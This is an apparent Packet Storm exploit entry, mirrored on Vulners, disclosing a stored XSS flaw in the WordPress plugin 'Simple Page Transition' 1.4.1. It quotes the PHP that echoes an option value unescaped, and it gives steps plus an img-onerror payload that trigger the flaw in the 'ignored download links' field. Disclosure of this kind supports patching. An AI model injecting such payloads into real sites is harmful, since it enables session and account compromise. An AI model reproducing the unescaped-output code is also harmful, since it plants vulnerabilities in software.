Lucene search
K

WordPress Simple Page Transition 1.4.1 Cross Site Scripting

🗓️ 27 Jun 2022 00:00:00Reported by Mariam TariqType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 348 Views

WordPress Simple Page Transition 1.4.1 Cross Site Scripting exploi

Code
`# Exploit Title: WordPress Plugin ‘Simple Page Transition’ - Stored Cross  
Site Scripting  
# Date: 27-06-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/  
# Version: 1.4.1  
# Tested on: Firefox  
# Contact me: [email protected]  
  
  
*#Vulnerable code*:  
  
```  
<label for="simple_page_transition_ignored"><?php _e( 'Ignored Download  
Links', 'spt' ); ?></label><br />  
<input type="text" id="simple_page_transition_ignored"  
name="simple_page_transition_ignored" value="*<?php print  
$simple_page_transition_ignored; ?>*" /><br />  
  
```  
*#POC:*  
  
1- Install the plugin ‘simple page transition’ & activate it.  
2- Navigate towards the “ignored download links”  
3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`  
  
*#POC image:*  
  
https://imgur.com/yzaTkhi  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation